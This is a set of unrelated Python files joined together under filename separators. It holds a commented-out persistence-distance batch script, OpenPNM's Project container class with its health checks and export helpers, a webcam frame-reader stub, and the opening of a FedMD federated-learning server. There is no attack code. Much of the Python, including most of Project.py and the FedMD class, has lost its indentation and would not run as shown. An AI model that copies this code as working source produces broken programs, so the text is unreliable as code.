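#     partial(create_persistence_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/",
#             filtration="rips", distance_type="wasserstein"),
#     partial(create_persistence_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/",
#             filtration="alpha", distance_type="bottleneck"),
# )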
########################################################################################################################
""" RUN THE DISTANCES
run_in_parallel(
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", distance_type="wasserstein"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", distance_type="wasserstein"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", distance_type="wasserstein"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", distance_type="bottleneck"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", distance_type="bottleneck"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", distance_type="bottleneck")
)
"""
########################################################################################################################
|
Project.py
|
import time
import uuid
import openpnm
import numpy as np
from copy import deepcopy
from openpnm.utils import SettingsDict, HealthDict, Workspace, logging
from .Grid import Tableist
logger = logging.getLogger(__name__)
ws = Workspace()
class Project(list):
r"""
This class provides a container for all OpenPNM objects in a given
simulation.
    A simulation is defined as a Network and all of its associated objects.
When instantiating a Network, a Project can be passed as an argument, but
if not given one is created. When instantiating any other object either
a Network or a Project can be supplied. In the former case, the
Network's Project is retrieved and used. The end result is that all
objects are stored in a specific Project.
The Project to which any object belongs can be retrieved with
``obj.project``. Conversely, printing a Project displays a list of all
objects it contains.
    Moreover, all Projects are registered with the Workspace. Since there can
    be only one instance of the Workspace, it is possible to view all open Projects
by printing the Workspace.
See Also
--------
Workspace
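    Examples
    --------
    A minimal sketch (assuming the standard ``Cubic`` network class):
    >>> import openpnm as op
    >>> pn = op.network.Cubic(shape=[3, 3, 3])
    >>> proj = pn.project      # every OpenPNM object knows its Project
    >>> pn in proj             # and the Project lists all objects it contains
    True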
"""
def __init__(self, *args, **kwargs):
name = kwargs.pop('name', None)
super().__init__(*args, **kwargs)
self.settings = SettingsDict()
ws[name] = self # Register self with workspace
self.settings['_uuid'] = str(uuid.uuid4())
def extend(self, obj):
r"""
This function is used to add objects to the project. Arguments can
be single OpenPNM objects, an OpenPNM project list, or a plain list of
OpenPNM objects. Note that if an object has the same name as one
        already existing on the project, then it will be renamed automatically.
"""
if not isinstance(obj, list):
obj = [obj]
for item in obj:
if hasattr(item, '_mro'):
if 'GenericNetwork' in item._mro():
if self.network:
raise Exception('Project already has a network')
# Must use append since extend breaks the dicts up into
# separate objects, while append keeps it as a single object.
if item in self:
raise Exception('Supplied object already part of project')
if item.name in self.names:
item.name = self._generate_name(item)
super().append(item)
else:
raise Exception('Only OpenPNM objects can be added')
def append(self, obj):
r"""
The Project (a list) must be kept as a flat list, so the append
function, which can normally be used to insert a list into a list, is
overloaded to basically prevent the normal append operation and simply
calls ``extend``.
"""
self.extend(obj)
def remove(self, obj):
r"""
The given object is removed from the project
        This removes the object, along with all its labels in associated
objects, but does NOT remove the associated objects.
See Also
-------
purge_object
"""
self.purge_object(obj, deep=False)
def pop(self, index):
r"""
The object at the given index is removed from the list and returned.
Notes
-----
This method uses ``purge_object`` to perform the actual removal of the
        object. It is recommended to just use that directly instead.
See Also
--------
purge_object
"""
obj = self[index]
self.purge_object(obj, deep=False)
return obj
def insert(self, index, obj):
r"""
Inserts the supplied object at the specified index in the Project list
Notes
-----
        The order of the objects in an OpenPNM Project list does not matter, so
it is recommended to just use ``append`` instead.
See Also
--------
append
extend
"""
self.extend(obj)
def clear(self, objtype=[]):
r"""
        Clears objects from the project entirely or selectively, depending on
the received arguments.
Parameters
----------
objtype : list of strings
A list containing the object type(s) to be removed. If no types
are specified, then all objects are removed. To clear only objects
of a specific type, use *'network'*, *'geometry'*, *'phase'*,
*'physics'*, or *'algorithm'*. It's also possible to use
abbreviations, like *'geom'*.
"""
if len(objtype) == 0:
super().clear()
else:
names = [obj.name for obj in self]
for name in names:
try:
obj = self[name]
for t in objtype:
if obj._isa(t):
self.purge_object(obj)
except KeyError:
pass
def copy(self, name=None):
r"""
Creates a deep copy of the current project
A deep copy means that new, unique versions of all the objects are
created but with identical data and properties.
Parameters
----------
name : string
The name to give to the new project. If not supplied, a name
is automatically generated.
Returns
-------
proj : list
A new Project object containing copies of all objects
Notes
-----
Because they are new objects, they are given a new uuid
(``obj.settings['_uuid']``), but the uuid of the original object is
also stored (``obj.settings['_uuid_old']``) for reference.
"""
if name is None:
name = ws._gen_name()
proj = deepcopy(self)
for item in proj:
item.settings['_uuid'] = str(uuid.uuid4())
self.settings['_uuid'] = str(uuid.uuid4())
ws[name] = proj
return proj
@property
def workspace(self):
return ws
def _set_name(self, name):
if name is None:
name = ws._gen_name()
ws[name] = self
def _get_name(self):
for key in ws.keys():
if ws[key] is self:
return key
name = property(fget=_get_name, fset=_set_name)
def __getitem__(self, key):
if isinstance(key, str):
obj = None
for item in self:
if item.name == key:
obj = item
if obj is None:
raise KeyError(key)
else:
obj = super().__getitem__(key)
return obj
def find_phase(self, obj):
r"""
Find the Phase associated with a given object.
Parameters
----------
obj : OpenPNM Object
Can either be a Physics or Algorithm object
Returns
-------
phase : OpenPNM Phase object
Raises
------
If no Phase object can be found, then an Exception is raised.
"""
# If received phase, just return self
if obj._isa('phase'):
return obj
# If phase happens to be in settings (i.e. algorithm), look it up
if 'phase' in obj.settings.keys():
return self.phases()[obj.settings['phase']]
# Otherwise find it using bottom-up approach (i.e. look in phase keys)
for item in self.phases().values():
if ('pore.' + obj.name in item) or ('throat.' + obj.name in item):
return item
# If all else fails, throw an exception
raise Exception('Cannot find a phase associated with '+obj.name)
def find_geometry(self, physics):
r"""
Find the Geometry associated with a given Physics
Parameters
----------
physics : OpenPNM Physics Object
Must be a Physics object
Returns
-------
geom : OpenPNM Geometry object
Raises
------
If no Geometry object can be found, then an Exception is raised.
"""
# If geometry happens to be in settings, look it up directly
if 'geometry' in physics.settings.keys():
geom = self.geometries()[physics.settings['geometry']]
return geom
# Otherwise, use the bottom-up approach
for geo in self.geometries().values():
if physics in self.find_physics(geometry=geo):
return geo
# If all else fails, throw an exception
raise Exception('Cannot find a geometry associated with '+physics.name)
def find_physics(self, geometry=None, phase=None):
r"""
Find the Physics object(s) associated with a given Geometry, Phase,
or combination.
Parameters
----------
geometry : OpenPNM Geometry Object
The Geometry object for which the Physics object(s) are sought
phase : OpenPNM Phase Object
The Phase object for which the Physics object(s) are sought
Returns
-------
physics : list
A list containing the Physics object(s). If only a ``geometry`` is
            specified, then the Physics for all Phases is returned. If only a
            ``phase`` is specified, then the Physics for all Geometries is
            returned. If both ``geometry`` and ``phase`` are specified, then
            the list only contains a single Physics. If no Physics is found,
            then the list will be empty. See the Notes section for more
information.
See Also
--------
grid
Notes
-----
The Project has a ``grid`` attribute that shows the associations of
all objects. If each Geometry represents a row and each Phase is a
column, then each row/col intersection represents a Physics. This
        method finds the Physics at each intersection.
"""
if geometry is not None and phase is not None:
physics = self.find_physics(geometry=geometry)
phases = list(self.phases().values())
return physics[phases.index(phase)]
if geometry is not None and phase is None:
result = []
geoPs = self.network[f'pore.{geometry.name}']
geoTs = self.network[f'throat.{geometry.name}']
for _phase in self.phases().values():
physics = self.find_physics(phase=_phase)
for phys in physics:
Ps = _phase.map_pores(pores=phys.Ps, origin=phys)
physPs = _phase.tomask(pores=Ps)
Ts = _phase.map_throats(throats=phys.Ts, origin=phys)
physTs = _phase.tomask(throats=Ts)
if np.all(geoPs == physPs) and np.all(geoTs == physTs):
result.append(phys)
return result
if geometry is None and phase is not None:
names = set(self.physics().keys())
keys = set([item.split('.')[-1] for item in phase.keys()])
hits = names.intersection(keys)
return [self.physics().get(i, None) for i in hits]
return list(self.physics().values())
def find_full_domain(self, obj):
r"""
Find the full domain object associated with a given object.
        For a Geometry the Network is found, for a Physics the Phase is found,
        and all other objects, which are already defined for the full domain,
        are returned as themselves.
Parameters
----------
obj : OpenPNM Object
Can be any object
Returns
-------
obj : An OpenPNM object
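        Examples
        --------
        A hypothetical sketch (not from the original source), assuming an
        OpenPNM 2.x project; object names are illustrative:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[3, 3, 3])
        >>> geo = op.geometry.GenericGeometry(network=pn, pores=pn.Ps,
        ...                                   throats=pn.Ts)
        >>> domain = pn.project.find_full_domain(geo)  # -> the network ``pn``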
"""
if 'Subdomain' not in obj._mro():
# Network, Phase, Algorithm
return obj
if obj._isa() == 'geometry':
# Geometry
return self.network
# Physics
return self.find_phase(obj)
def _validate_name(self, name):
if name in self.names:
raise Exception('Another object is already named '+name)
for item in self:
for key in item.keys():
if key.split('.')[1] == name:
raise Exception('A property/label is already named '+name)
def _generate_name(self, obj):
prefix = obj.settings['prefix']
num = len(self._get_objects_by_type(obj._isa())) + 1
name = prefix + '_' + str(num).zfill(2)
try:
self._validate_name(name)
except Exception:
name = prefix + '_' + str(np.random.randint(100, 999))
return name
@property
def names(self):
names = [i.name for i in self]
return names
def purge_object(self, obj, deep=False):
r"""
Remove an object from the Project. This removes all references to
the object from all other objects (i.e. removes labels)
Parameters
----------
obj : OpenPNM Object or list of objects
The object(s) to purge
deep : boolean
A flag that indicates whether to remove associated objects.
If ``True``, then removing a Geometry or Phase also removes
the associated Physics objects. If ``False`` (default) then
only the given object is removed, along with its labels in all
associated objects. Removing a Physics always keeps associated
Geometry and Phases since they might also be associated with other
Physics objects.
Raises
------
An Exception is raised if the object is a Network.
Notes
-----
For a clearer picture of this logic, type ``print(project.grid)`` at
the console. A deep purge of a Geometry is like removing a row, while
a Phase is like removing a column.
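        Examples
        --------
        A hypothetical sketch (not from the original source) of a deep purge,
        assuming an OpenPNM 2.x project; object names are illustrative:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[3, 3, 3])
        >>> geo = op.geometry.GenericGeometry(network=pn, pores=pn.Ps,
        ...                                   throats=pn.Ts)
        >>> air = op.phases.GenericPhase(network=pn)
        >>> phys = op.physics.GenericPhysics(network=pn, phase=air,
        ...                                  geometry=geo)
        >>> pn.project.purge_object(geo, deep=True)  # also removes ``phys``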
"""
if isinstance(obj, list):
for item in obj:
self.purge_object(obj=item, deep=deep)
return
if obj._isa() in ['physics', 'algorithm']:
self._purge(obj)
if obj._isa() == 'geometry':
if deep:
physics = self.find_physics(geometry=obj)
for phys in physics:
self._purge(self.physics()[phys.name])
self._purge(obj)
if obj._isa() == 'phase':
if deep:
physics = self.find_physics(phase=obj)
for phys in physics:
self._purge(self.physics()[phys.name])
self._purge(obj)
if obj._isa() == 'network':
raise Exception('Cannot purge a network, just make a new project')
def _purge(self, obj):
for item in self:
for key in list(item.keys()):
if key.split('.')[-1] == obj.name:
del item[key]
super().remove(obj)
def save_object(self, obj):
r"""
Saves the given object or list of objects to a pickle file
Parameters
----------
obj : OpenPNM object or list of objects
The objects to be saved. Depending on the object type, the file
extension will be one of 'net', 'geo', 'phase', 'phys' or 'alg'.
"""
from openpnm.io import Pickle
Pickle.save_object_to_file(objs=obj)
def load_object(self, filename):
r"""
Loads a single object from a pickle file
Parameters
----------
filename : string or path object
The name of the file containing the saved object. Can include
an absolute or relative path as well. If only a filename is
            given, it is assumed to be in the current working directory.
            The object type is inferred from the file extension.
"""
from openpnm.io import Pickle
Pickle.load_object_from_file(filename=filename, project=self)
def save_project(self, filename=None):
r"""
Save the current project to a ``pnm`` file.
Parameters
----------
filename : string or path object
The name of the file. Can include an absolute or relative path
as well. If only a filename is given it will be saved in the
current working directory.
"""
ws.save_project(project=self, filename=filename)
def _new_object(self, objtype, name=None):
r"""
"""
if objtype.startswith('net'):
obj = openpnm.network.GenericNetwork(project=self, name=name)
elif objtype.startswith('geo'):
obj = openpnm.geometry.GenericGeometry(project=self, name=name,
pores=[], throats=[])
elif objtype.startswith('pha'):
obj = openpnm.phases.GenericPhase(project=self, name=name)
elif objtype.startswith('phy'):
obj = openpnm.physics.GenericPhysics(project=self, name=name)
elif objtype.startswith('alg'):
obj = openpnm.algorithms.GenericAlgorithm(project=self, name=name)
else:
obj = openpnm.core.Base(project=self, name=name)
return obj
def export_data(self, phases=[], filename=None, filetype=None):
r"""
Export the pore and throat data from the given object(s) into the
specified file and format.
Parameters
----------
phases : list of OpenPNM Phase Objects
The data on each supplied phase will be added to file
filename : string
The file name to use. If none is supplied then one will be
automatically generated based on the name of the project
containing the supplied Network, with the date and time appended.
filetype : string
Which file format to store the data. If a valid extension is
            included in the ``filename``, this is ignored. Options are:
            **'vtk'** : (default) The Visualization Toolkit format, used by
            various software packages such as Paraview. This actually produces
            a 'vtp' file. NOTE: This can be quite slow since all the data is
            written to a simple text file. For large simulations consider
            'xdmf'.
            **'csv'** : The comma-separated values format, which is easily
            opened in any spreadsheet program. The column names represent
            the property name, including the type and name of the object to
            which they belong, all separated by the pipe character.
            **'xdmf'** : The extensible data markup format, which is a very
            efficient format for large data sets. This actually results in
            the creation of two files, the *xmf* file and an associated *hdf*
            file. The *xmf* file contains instructions for looking into the
            *hdf* file where the data is stored. Paraview opens the *xmf*
            format natively, and is very fast.
            **'mat'** : Matlab 'mat-file', which can be opened in Matlab.
Notes
-----
This is a helper function for the actual functions in the ``io``
module. For more control over the format of the output, and more
information about the format refer to ``openpnm.io``.
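        Examples
        --------
        A hypothetical sketch (not from the original source); the phase and
        file name are illustrative, and the call writes a file to disk:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[3, 3, 3])
        >>> air = op.phases.GenericPhase(network=pn)
        >>> pn.project.export_data(phases=[air],
        ...                        filename='my_net.csv')  # doctest: +SKIP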
"""
import builtins
project = self
network = self.network
if filename is None:
filename = project.name + '_' + time.strftime('%Y%b%d_%H%M%p')
if filetype is None:
if '.' in filename:
filetype = filename.split('.')[-1]
# Convert file type to io class name
temp = {"hdf": "hdf5", "xmf": "xdmf", "vtp": "vtk", "pkl": "pickle"}
if filetype in temp.keys():
filetype = temp[filetype]
else:
raise Exception('File type not given')
# Fetch correct io class, using case insensitive look-up
def igetattr(obj, attr):
for a in dir(obj):
if a.lower() == attr.lower():
return orig_getattr(obj, a)
orig_getattr = builtins.getattr
fmt = igetattr(openpnm.io, filetype)
fmt.export_data(network=network, phases=phases, filename=filename)
@property
def network(self):
net = list(self._get_objects_by_type('network').values())
net = net[0] if len(net) > 0 else None
return net
def geometries(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('geometry')
def phases(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('phase')
def physics(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('physics')
def algorithms(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('algorithm')
def _get_object_by_name(self, name):
for item in self:
if item.name == name:
return item
raise Exception('An object named ' + name + ' was not found')
def _get_objects_by_type(self, objtype):
return {item.name: item for item in self if item._isa(objtype)}
def __str__(self):
s = []
hr = '―'*78
s.append(hr)
s.append(' {0:<15} '.format('Object Name')
+ '{0:<65}'.format('Object ID'))
s.append(hr)
for item in self:
s.append(' {0:<15} '.format(item.name)
+ '{0:<65}'.format(item.__repr__()))
s.append(hr)
return '\n'.join(s)
def __repr__(self):
return self.__str__()
def check_geometry_health(self):
r"""
Perform a check to find pores with overlapping or undefined Geometries
Returns
-------
A HealthDict
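        Examples
        --------
        A hypothetical sketch (not from the original source); the Geometry is
        deliberately assigned to all but one pore so the check finds it:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[3, 3, 3])
        >>> geo = op.geometry.GenericGeometry(network=pn, pores=pn.Ps[:-1],
        ...                                   throats=pn.Ts)
        >>> h = pn.project.check_geometry_health()
        >>> unassigned = h['undefined_pores']  # contains the last pore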
"""
health = HealthDict()
health['overlapping_pores'] = []
health['undefined_pores'] = []
health['overlapping_throats'] = []
health['undefined_throats'] = []
geoms = self.geometries().keys()
if len(geoms) > 0:
net = self.network
Ptemp = np.zeros((net.Np,))
Ttemp = np.zeros((net.Nt,))
for item in geoms:
Pind = net['pore.'+item]
Tind = net['throat.'+item]
Ptemp[Pind] = Ptemp[Pind] + 1
Ttemp[Tind] = Ttemp[Tind] + 1
health['overlapping_pores'] = np.where(Ptemp > 1)[0].tolist()
health['undefined_pores'] = np.where(Ptemp == 0)[0].tolist()
health['overlapping_throats'] = np.where(Ttemp > 1)[0].tolist()
health['undefined_throats'] = np.where(Ttemp == 0)[0].tolist()
else:
health['undefined_pores'] = self.network.Ps
health['undefined_throats'] = self.network.Ts
return health
def check_physics_health(self, phase):
r"""
Perform a check to find pores which have overlapping or missing Physics
Parameters
----------
phase : OpenPNM Phase object
The Phase whose Physics should be checked
Returns
-------
A HealthDict
"""
health = HealthDict()
health['overlapping_pores'] = []
health['undefined_pores'] = []
health['overlapping_throats'] = []
health['undefined_throats'] = []
geoms = self.geometries().keys()
if len(geoms) > 0:
phys = self.find_physics(phase=phase)
if len(phys) == 0:
raise Exception(str(len(geoms))+' geometries were found, but'
+ ' no physics')
if None in phys:
raise Exception('Undefined physics found, check the grid')
Ptemp = np.zeros((phase.Np,))
Ttemp = np.zeros((phase.Nt,))
for item in phys:
Pind = phase['pore.'+item.name]
Tind = phase['throat.'+item.name]
Ptemp[Pind] = Ptemp[Pind] + 1
Ttemp[Tind] = Ttemp[Tind] + 1
health['overlapping_pores'] = np.where(Ptemp > 1)[0].tolist()
health['undefined_pores'] = np.where(Ptemp == 0)[0].tolist()
health['overlapping_throats'] = np.where(Ttemp > 1)[0].tolist()
health['undefined_throats'] = np.where(Ttemp == 0)[0].tolist()
return health
def check_data_health(self, obj):
r"""
Check the health of pore and throat data arrays.
Parameters
----------
obj : OpenPNM object
A handle of the object to be checked
Returns
-------
health : dict
            Returns a HealthDict object, which is a basic dictionary with an
            added ``health`` attribute that is True if all entries in the
            dict are deemed healthy (empty lists), or False otherwise.
"""
health = HealthDict()
for item in obj.props():
health[item] = []
if obj[item].dtype == 'O':
health[item] = 'No checks on object'
elif np.sum(np.isnan(obj[item])) > 0:
health[item] = 'Has NaNs'
elif np.shape(obj[item])[0] != obj._count(item.split('.')[0]):
health[item] = 'Wrong Length'
return health
def check_network_health(self):
r"""
        This method checks the network's topological health by checking for:
(1) Isolated pores
(2) Islands or isolated clusters of pores
(3) Duplicate throats
        (4) Bidirectional throats (i.e. a symmetrical adjacency matrix)
(5) Headless throats
Returns
-------
health : dict
            A dictionary containing the offending pore or throat numbers
            under each named key.
        Notes
        -----
        It also returns a list of which pores and throats should be trimmed
        from the network to restore health. This list is a suggestion only,
        and is based on keeping the largest cluster and trimming the others.
        - Does not yet check for duplicate pores
        - Does not yet suggest which throats to remove
        - This is just a 'check' and does not 'fix' the problems it finds
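        Examples
        --------
        A hypothetical sketch (not from the original source); a throat is
        trimmed so that the check has an isolated pore to report:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[4, 1, 1])
        >>> op.topotools.trim(network=pn, throats=[0])
        >>> h = pn.project.check_network_health()
        >>> lonely = h['isolated_pores']  # pore 0 is now disconnected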
"""
import scipy.sparse.csgraph as csg
import scipy.sparse as sprs
health = HealthDict()
health['disconnected_clusters'] = []
health['isolated_pores'] = []
health['trim_pores'] = []
health['duplicate_throats'] = []
health['bidirectional_throats'] = []
health['headless_throats'] = []
health['looped_throats'] = []
net = self.network
# Check for headless throats
hits = np.where(net['throat.conns'] > net.Np - 1)[0]
if np.size(hits) > 0:
health['headless_throats'] = np.unique(hits)
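            # Return early; the remaining checks assume throat conns that
            # reference valid pore indices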
return health
# Check for throats that loop back onto the same pore
P12 = net['throat.conns']
hits = np.where(P12[:, 0] == P12[:, 1])[0]
if np.size(hits) > 0:
health['looped_throats'] = hits
# Check for individual isolated pores
Ps = net.num_neighbors(net.pores())
if np.sum(Ps == 0) > 0:
health['isolated_pores'] = np.where(Ps == 0)[0]
# Check for separated clusters of pores
temp = []
am = net.create_adjacency_matrix(fmt='coo', triu=True)
Cs = csg.connected_components(am, directed=False)[1]
if np.unique(Cs).size > 1:
for i in np.unique(Cs):
temp.append(np.where(Cs == i)[0])
b = np.array([len(item) for item in temp])
c = np.argsort(b)[::-1]
for i, j in enumerate(c):
health['disconnected_clusters'].append(temp[c[i]])
if i > 0:
health['trim_pores'].extend(temp[c[i]])
# Check for duplicate throats
am = net.create_adjacency_matrix(fmt='csr', triu=True).tocoo()
hits = np.where(am.data > 1)[0]
if len(hits) > 0:
mergeTs = []
hits = np.vstack((am.row[hits], am.col[hits])).T
ihits = hits[:, 0] + 1j*hits[:, 1]
conns = net['throat.conns']
iconns = conns[:, 0] + 1j*conns[:, 1] # Convert to imaginary
for item in ihits:
mergeTs.append(np.where(iconns == item)[0])
health['duplicate_throats'] = mergeTs
# Check for bidirectional throats
adjmat = net.create_adjacency_matrix(fmt='coo')
num_full = adjmat.sum()
temp = sprs.triu(adjmat, k=1)
num_upper = temp.sum()
if num_full > num_upper:
biTs = np.where(net['throat.conns'][:, 0]
> net['throat.conns'][:, 1])[0]
health['bidirectional_throats'] = biTs.tolist()
return health
def show_model_dependencies(self, prop, obj):
r"""
"""
deps = {prop: self._get_deps(prop, obj)}
self._view_dependencies(deps)
def _get_deps(self, prop, obj):
deps = {}
try:
model = obj.models[prop]
for item in model.values():
if isinstance(item, str):
if item.startswith('pore.') or item.startswith('throat.'):
upstream = self._get_deps(item, obj)
deps.update({item: upstream})
except KeyError:
if obj._isa('physics'):
phase = self.find_phase(obj)
geom = self.find_geometry(obj)
if prop in phase.models.keys():
deps.update(self._get_deps(prop, phase))
elif prop in geom.models.keys():
deps.update(self._get_deps(prop, geom))
else:
pass
return deps
def _deps_to_jsongraph(self, children, name=None, parent=None):
if parent is None:
parent = "null"
if name is None:
name = list(children.keys())[0]
tree = {"name": name,
"parent": parent,
"color": hex(hash(name.split('.')[1]))[3:9],
"children": []}
for item in children[name].keys():
sub_tree = self._deps_to_jsongraph(parent=name, name=item,
children=children[name])
tree["children"].append(sub_tree)
return tree
def _view_dependencies(self, deps, port=8008):
import json
import webbrowser
import threading
import os
web_dir = os.path.join(os.path.dirname(__file__), '../../public')
os.chdir(web_dir)
from http.server import HTTPServer, SimpleHTTPRequestHandler
server = HTTPServer(server_address=('', port),
RequestHandlerClass=SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
data = self._deps_to_jsongraph(deps)
with open('data/tree.json', 'w') as outfile:
json.dump(data, outfile)
# Launch browser
webbrowser.open(f"http://localhost:{port}/dep_map.html")
def inspect_locations(self, element, indices, objs=[], mode='all'):
r"""
Shows the values of all props and/or labels for a given subset of
pores or throats.
Parameters
----------
element : str
The type of locations to inspect, either 'pores', or 'throats'
indices : array_like
The pore or throat indices to inspect
objs : list of OpenPNM Objects
            If given, then only the properties on the given objects are
            inspected. If not given, then all objects are inspected (default).
mode : list of strings
Indicates whether to inspect 'props', 'labels', or 'all'. The
            default is 'all'.
Returns
-------
df : Pandas DataFrame
A data frame object with each location as a column and each row
as a property and/or label.
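        Examples
        --------
        A hypothetical sketch (not from the original source); it inspects the
        first three pores of a small Cubic network:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[3, 3, 3])
        >>> df = pn.project.inspect_locations(element='pores',
        ...                                   indices=[0, 1, 2])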
"""
from pandas import DataFrame
props = {}
if not isinstance(objs, list):
objs = [objs]
if len(objs) == 0:
objs = self
for obj in objs:
d = {k: obj[k][indices] for k in obj.keys(element=element, mode=mode)}
for item in list(d.keys()):
if d[item].ndim > 1:
d.pop(item)
if item == 'pore.coords':
d['pore.coords_X'], d['pore.coords_Y'], \
d['pore.coords_Z'] = obj['pore.coords'][indices].T
if item == 'throat.conns':
d['throat.conns_head'], d['throat.conns_tail'] = \
obj['throat.conns'][indices].T
_ = [props.update({obj.name+'.'+item: d[item]}) for item in d.keys()]
df = DataFrame(props)
df = df.rename(index={k: indices[k] for k, _ in enumerate(indices)})
return df.T
def _regenerate_models(self, objs=[], propnames=[]):
r"""
Can be used to regenerate models across all objects in the project.
Parameters
----------
objs : list of OpenPNM objects
            Can be used to specify which objects to regenerate. The default
            is to regenerate all objects. If a subset of objects is given,
            this function ensures they are regenerated in a sensible order,
            e.g. Phases are done before any Physics objects.
        propnames : list of strings, or string
            The specific models to regenerate. If none are given then ALL
            models on all objects are regenerated. If a subset is given,
            then only objects that have a corresponding model are
            regenerated, to avoid any problems. This means that a single
            model can be given, without specifying the objects.
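        Examples
        --------
        A hypothetical sketch (not from the original source); ``pore.seed``
        is an illustrative model name that StickAndBall geometries define:
        >>> import openpnm as op
        >>> pn = op.network.Cubic(shape=[3, 3, 3])
        >>> geo = op.geometry.StickAndBall(network=pn, pores=pn.Ps,
        ...                                throats=pn.Ts)
        >>> pn.project._regenerate_models(propnames='pore.seed')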
"""
objs = list(objs)
if objs == []:
objs = self
if isinstance(propnames, str):
propnames = [propnames]
# Sort objs in the correct order (geom, phase, phys)
net = [i for i in objs if i is self.network]
geoms = [i for i in objs if i in self.geometries().values()]
phases = [i for i in objs if i in self.phases().values()]
phys = [i for i in objs if i in self.physics().values()]
objs = net + geoms + phases + phys
for obj in objs:
if len(propnames) > 0:
for model in propnames:
if model in obj.models.keys():
obj.regenerate_models(propnames=model)
else:
obj.regenerate_models()
def _generate_grid(self):
r"""
"""
grid = ProjectGrid()
# Create first/index column of grid
rows = [self.network.name] + list(self.geometries().keys())
grid.add_row(num=len(rows) - 1)
grid.set_col(0, rows)
        # Create first/header row of grid
cols = list(self.phases().keys())
grid.add_col(num=len(cols))
grid.set_row(0, vals=[self.network.name] + cols)
# Now add physics objects to grid, adding new columns/rows as needed.
miss = 0
for p in self.physics().values():
try:
row = self.find_geometry(p)
try:
col = self.find_phase(p)
grid.set_row_and_col(row=row.name, col=col.name, val=p.name)
except Exception:
miss += 1
grid.set_row_and_col(row=row.name, col='?'*miss, val=p.name)
            except Exception:
try:
col = self.find_phase(p)
miss += 1
grid.set_row_and_col(row='?'*miss, col=col.name, val=p.name)
except Exception:
miss += 1
grid.set_row_and_col(row='?'*miss, col='?'*miss, val=p.name)
# See if any pores/throats are not assigned and add blank row
if len(self.geometries()) > 0:
h = self.check_geometry_health()
if (len(h['undefined_pores']) > 0) or (len(h['undefined_throats']) > 0):
grid.add_row()
return grid
def _get_grid(self):
if not hasattr(self, '_grid'):
grid = self._generate_grid()
self._grid = grid
else: # Update current grid with new data, to save formats and settings
grid = self._generate_grid()
self._grid._grid.table_data = grid._grid.table_data
return self._grid
def _set_grid(self, grid):
self._grid = grid
grid = property(fget=_get_grid, fset=_set_grid)
class ProjectGrid(Tableist):
r"""
    This is a subclass of a Tableist grid, which adds the ability to look
    up entries by Geometry and Phase names, as more specific versions of
    rows and cols.
"""
def row(self, name):
r"""
Retrieve a specified row from the table
Parameters
----------
name : str
The row name, specified by the ``geometry`` object name
Returns
-------
table
A table object containing only a single row
"""
return self.get_row(name)._grid.table_data[0]
def col(self, name):
r"""
Retrieve a specified column from the table
Parameters
----------
name : str
The column name, specified by the ``phase`` object name
Returns
-------
table
A table object containing only a single column
"""
temp = self.get_col(name)._grid.table_data
temp = [i[0] for i in temp]
return temp
def geometries(self):
r"""
Retrieve a list of all geometries
"""
temp = self.index[1:]
temp = [i[0] for i in temp]
return temp
def phases(self):
r"""
Retrieve a list of all phases
"""
return self.header[0][1:]
|
__init__.py
|
import cv2
from threading import Thread
class smartFrameReader:
    def __init__(self):
        self.vidcap = cv2.VideoCapture(0)
        self.frame = None
        self.status = 0
    def foreverRead(self):
        """ continuously reads frames in the background. """
        while True:
            ret, tempFrame = self.vidcap.read()
            if self.status != 0:
                self.frame = tempFrame
                self.status = 0
    def getFrame(self):
        """ returns the most recently captured frame. """
        self.status = 1
        while self.status == 1:
            pass
        return self.frame
    def startReading(self):
        """ starts reading frames in a daemon thread. frames are read
        continuously to remove lag. """
        rdr = Thread(target=self.foreverRead)
        rdr.daemon = True
        rdr.start()
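# Hypothetical usage sketch (not in the original): startReading() must be
# called before getFrame(), otherwise getFrame() busy-waits forever.
#   reader = smartFrameReader()
#   reader.startReading()
#   frame = reader.getFrame()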
class faceFinder:
pass
class faceIDer:
pass
|
serverFedMD.py
|
import wandb
from flcore.clients.clientFedMD import clientFedMD
from flcore.servers.serverbase import Server
from torch.utils.data import DataLoader
import copy
from utils.data_utils import read_client_data
from threading import Thread
import torch
import torchvision.transforms as transforms
import torchvision
import numpy as np
class FedMD(Server):
def __init__(self, device, dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal, time_threthold, run_name, choose_client):
super().__init__(dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal,
time_threthold, run_name)
# select slow clients
self.set_slow_clients()
for i, train_slow, send_slow in zip(choose_client, self.train_slow_clients, self.send_slow_clients):
# train, test = read_client_data(dataset, i)
client = clientFedMD(device, i, train_slow, send_slow, self.train_all[i], self.test_all[i], model, batch_size, learning_rate, local_steps)
self.clients.append(client)
self.device = device
self.public_data_loader = DataLoader(self.public, batch_size, drop_last=True)
self.alignment_step = int(local_steps/20)
del(self.train_all)
del(self.test_all)
del(self.public)
self.iter_trainloader = iter(self.public_data_loader)
print(f"\nJoin clients / total clients: {self.join_clients} / {self.num_clients}")
print("Finished creating server and clients.")
def nas_competetive_output(self, output):
if isinstance(output, tuple):
output = output[1]
if isinstance(output, list):
            assert len(output) == 2, "output must have {:} items instead of {:}".format(
2, len(output)
)
output, output_aux = output
else:
output, output_aux = output, None
return output
